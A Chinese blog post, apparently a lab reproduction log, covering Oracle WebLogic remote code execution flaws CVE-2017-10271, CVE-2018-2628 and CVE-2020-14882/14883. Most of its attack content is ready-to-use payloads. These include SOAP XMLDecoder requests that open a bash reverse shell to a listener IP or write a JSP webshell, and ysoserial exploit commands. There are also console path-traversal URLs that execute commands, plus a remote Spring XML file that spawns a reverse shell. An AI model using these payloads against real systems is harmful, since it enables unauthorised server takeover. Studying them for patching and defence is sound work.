weblogic已复现漏洞

最新推荐文章于 2023-06-21 18:18:03 发布
最新推荐文章于 2023-06-21 18:18:03 发布
阅读量419 收藏
点赞数
分类专栏: web学习 文章标签: java 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61142406/article/details/125020590
版权

CVE-2017-10271远程代码执行漏洞

**漏洞本质:**主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令

影响版本

10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2

反弹shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.64.142:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 639

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.64.133/3333 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

写入webshell(访问:http://your-ip:7001/bea_wls_internal/test.jsp):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

攻击步骤

java -cp “/root/桌面/ysoserial-0.1-cve-2018-2628-all.jar” ysoserial.exploit.JRMPListener 3333 Jdk7u21 “ifconfig”

python2 /root/桌面/cve-2018-2628.py 192.168.64.142 7001 /root/桌面/ysoserial-0.1-cve-2018-2628-all.jar 192.168.64.133 3333 JRMPClient

   CVE-2018-2628影响的软件版本为:
   Weblogic 10.3.6.0
   Weblogic 12.1.3.0
   Weblogic 12.2.1.2
   Weblogic 12.2.1.3

未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)

经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。

CVE-2020-14883是一个 Console 的未授权访问,而 CVE-2020-14882是在利用未授权访问的前提下,在 Console 进行代码执行,于是远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。

漏洞影响版本

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

访问管理页面测试:

http://ip:7001/console/login/LoginForm.jsp

CVE-2020-14883: 权限绕过漏洞的poc:

http://192.168.37.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

CVE-2020-14882: 代码执行漏洞的poc(写入文件)

http://192.168.37.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/test%27);%22);

反弹shell

poc.xml如下,部署在另外一台靶机可访问的服务器上,

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd</value>
                <value>/c</value>
                <value><![CDATA[bash -i >& /dev/tcp/192.168.37.128/7890 0>&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

加载并执行远端xml文件:

http://192.168.37.128:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://192.168.37.141/shell.xml”)

I·CE
关注
专栏目录
weblogic ssrf 漏洞复现
薛定谔嘚喵博客
05-06 627
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Java反序列化漏洞CVE-2018-2628 分析
u014715599的博客
12-26 3458
一、 前言 认识Java序列化与反序列化 定义: 序列化就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程   反序列化即逆过程,由字节流还原成对象   注: 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。 且看接下来怎么一步步揭开反序列化漏洞利用的面纱的。(小白文) 二、CVE-2018-2628反序列化漏洞详情分析 在分析这个漏洞的时候,中间也看了好多前辈...
weblogic 漏洞复现
03-11 7316
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录 sudo service docker start //启动docker服务 docker-compose up -d //启动 docker-compose stop //测试完毕后停止服务 docker-compose down //移除容器 Weblogic 任意文件上传漏洞(CVE-2018-2894) 漏洞成因:WebLogic 管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限
Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现
m0_58596609的博客
12-28 2715
Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) 含 JNDIExploit.v1.11.jar 以及POC
CVE-2018-2628
04-18 218
哈哈哈,终于等到我复现一个CVE漏洞了。漏洞描述Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。攻击者可以在未授权的情况下,通过T3协议在WebLogic Ser...
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 989
CVE-2018-2628
漏洞分析之CVE-2017-11882
airuihuan5211的博客
11-26 335
漏洞分析之 CVE-2017-11882 目录 漏洞分析之 CVE-2017-11882目录☛ 漏洞介绍☛ 漏洞分析☛ 1.漏洞分析环境与工具☛ 2.获取 Poc[点击????]☛ 3.复现漏洞☛ 4.分析漏洞☛ 5.漏洞利用☛ 6.利用漏洞2☛ 总结☛ 参考资料完成时间:2018-10-23 10:24:05 星期二 ☛ 漏洞介绍 安全公司Embedi最早报告了漏洞,其出现在...
Weblogic漏洞复现
m0_62392732的博客
12-21 578
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 3.4.2受影响版本 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic...
weblogic漏洞复现
weixin_52374319的博客
06-21 628
4、查看ldap服务器,成功反弹shell。3、执行exp获取反弹shell
Weblogic SSRF漏洞复现
K_ShenH的博客
06-24 1094
Weblogic SSRF漏洞
Weblogic反序列化漏洞(CVE-2018-2628)
weixin_41182861的博客
09-25 871
漏洞简述 在 Weblogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。 漏洞编号:CVE-2017-10271 影响版本:10.3.6.0.0、12.1.3.0、12.2.1.1和12.2.1.2 测试环境:Linux || vulhub |
maven项目报错
06-29 332
[root@kube-master iff]# kubectl logs iff-dm-3029278244-9qrp6 -n iffjava.lang.IllegalArgumentException: Prefix string too short at java.io.File.createTempFile(File.java:2001) at java...
Weblogic历史漏洞复现
m0_53183117的博客
02-27 1693
Weblogic历史漏洞
通过weblogic报错页面发现版本_WebLogic CVE-2018-2628漏洞 修复说明手册
weixin_39664995的博客
12-18 639
事件概要:北京时间4月18日凌晨,Oracle官方发布了4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。BUG 描述此...
漏洞复现(CVE-2017-10271)
PDblue的博客
03-27 9698
使用https://github.com/vulhub/vulhub在本地进行漏洞环境搭建,需要使用的工具是https://github.com/hanc00l/weblogic_wls_wsat_rce 环境搭建完成后通过浏览器进行访问 使用工具对漏洞进行验证 向服务器上传后门文件 通过浏览器访问后门文件 仅限于本地漏洞环境验证。...
Tomcat任意文件上传漏洞CVE-2017-12615复现测试
热门推荐
黑面狐
09-20 3万+
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 我本地下载的是tomcat7.0.56版本测试 测试过程: 1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false 如图: 然后启动tom
weblogic0638_盘点:Weblogic T3反序列化历史漏洞复现及分析
weixin_29192141的博客
01-12 688
本文是osword同学的Java安全学习笔记之一,将详细分析Weblogic历史,从CVE-2015至CVE-2019相关历史漏洞入手,记录学习Java反序列化漏洞的心得CVE-2015-4852影响版本Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracl...
Oracle Coherence&WebLogic反序列化远程代码执行漏洞安全风险通告
smellycat000的专栏
03-07 720
近日,奇安信CERT监测到包含在1月份Oracle关键补丁程序更新CPU(Critical Patch Update)的漏洞Oracle Coherence反序列化远程代码执行漏洞(C...
weblogic漏洞复现vulhub
最新发布
08-21
复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值